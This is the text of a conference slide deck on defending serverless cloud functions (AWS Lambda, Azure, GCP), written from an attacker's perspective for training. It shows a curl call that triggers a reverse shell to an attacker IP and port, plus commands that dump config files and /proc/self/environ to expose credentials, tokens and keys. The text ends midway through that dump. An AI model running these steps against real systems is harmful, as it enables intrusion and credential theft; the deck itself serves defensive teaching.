SESSION ID: CSV-T12 Defending Serverless Infrastructure in the Cloud Eric Johnson Principal Security Engineer, Puma Security Principal Instructor, SANS Institute www.linkedin.com/in/eric-m-johnson @emjohn20 #RSAC #RSAC Cloud Serverless Infrastructure Functions as a Service (FaaS) managed infrastructure offerings across the Big 3 cloud providers: AWS Lambda Azure Functions 2 GCP Functions #RSAC Goals For This Session Reverse engineer the serverless execution environment Discover insecurely stored function secrets Exfiltrate authentication tokens from the serverless container Detect stolen authentication tokens accessing cloud resources Apply network controls to prevent command and control Leverage audit logging and monitoring to detect malicious activity 3 #RSAC Function Execution Environment Defending Serverless Infrastructure in the Cloud Function Execution Environment Understanding the attacker's view of a serverless execution environment helps prioritize defenses: What user is executing the function? What operating system (OS) is running the function? What is the default directory? Where is the source code? What environment variables exist? Where are the service account creds / authentication tokens? What directories are writable? 5 #RSAC Puma Security: Serverless Prey Serverless Prey is an open source repository containing: Functions to establish a reverse shell in each cloud – Cheetah: Google Function – Cougar: Azure Function – Panther: AWS Lambda Code and documentation to reproduce information presented in this session https://github.com/pumasecurity/serverless-prey 6 #RSAC Establishing The Function Reverse Shell Function Invocation Reverse Shell Create the connection back to the attacker's server: Attacker's server waits for the incoming connections and issues commands: $ curl "https://uscentral1-precise-works123456.cloudfunctions.net /cheetah?host=13.58.4.216 &port=1042" 7 #RSAC #RSAC Serverless Execution Environment Reverse engineering each function's execution environment: Function OS Directory User NodeJS 12 Amazon Linux 2 /var/task sbx_user1051 .NET Core 3.1 Debian GNU/Linux 9 / app Go 1.11 Ubuntu 18.04.2 LTS /srv/files root 8 #RSAC Default Function Execution Networking Configurable triggers from HTTP or API Gateway events Routing allows Internet egress traffic and responses Routing allows egress traffic and responses to public cloud service APIs Virtual Private Cloud Internet Public Subnet Internet Gateway Cloud Private Subnet Function 9 Storage Secrets #RSAC Secrets Management Defending Serverless Infrastructure in the Cloud Serverless Secrets Management Options Options for managing secrets in cloud functions: Hard-code in source code Deploy a configuration file in the function's deployment package Pass secrets into the runtime as environment variables Read secrets from cloud key management service (KMS) or secrets manager 11 #RSAC Serverless Secrets: Where is the Source Code? Start by looking for secrets in the function source code: /var/task AWS Lambda Azure Functions /home/site/wwwroot/ /srv/files GCP Functions 12 #RSAC #RSAC GCP Function: Source Code Example Inspecting the GCP Function deployment package: 1 $ ls –la /srv/files 2 3 4 5 6 7 8 9 10 total 167 -rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r-- 1 1 1 1 1 1 1 root root root root root root root root root root root root root root 268 1898 178 170 1798 939 710 Jan Jan Jan Jan Jan Jan Jan 13 3 3 3 3 3 3 3 16:49 16:49 16:49 16:49 16:49 16:49 16:49 Makefile cheetah.go cheetah.yaml go.mod go.sum package.json serverless.yml GCP Functions GCP Function: Configuration File Example #RSAC Dumping the Go function's configuration data: 1 2 3 4 5 6 7 8 9 10 11 $ cat /srv/files/cheetah.yaml # Server configurations server: host: "10.42.42.42" port: 8000 # Database credentials database: user: "cheetah_user" pass: "QnV0IHVuaWNvcm5zIGFwcGFyZW50bHkgZG8gZX hpc3Qu" 14 GCP Functions #RSAC Azure Function: Environment Variable Example Environment variables can be accessed by remote attackers using local file inclusion or command injection vulnerabilities: 1 2 3 4 5 6 7 8 9 $ cat /proc/self/environ WEBSITE_AUTH_ENCRYPTION_KEY=BBDAD8269958635C8D4E3C713636D APPSETTING_AzureWebJobsStorage=6BZ4kOCoSD7T1fc8v4h8JpRg== APPSETTING_APPINSIGHTS_INSTRUMENTATIONKEY=5D17A234-6B814777-8528-6814374E9BD3 MSI_SECRET=A788C6DE68224140A927BB412B4E24AB AzureWebEncryptionKey=BBDAD80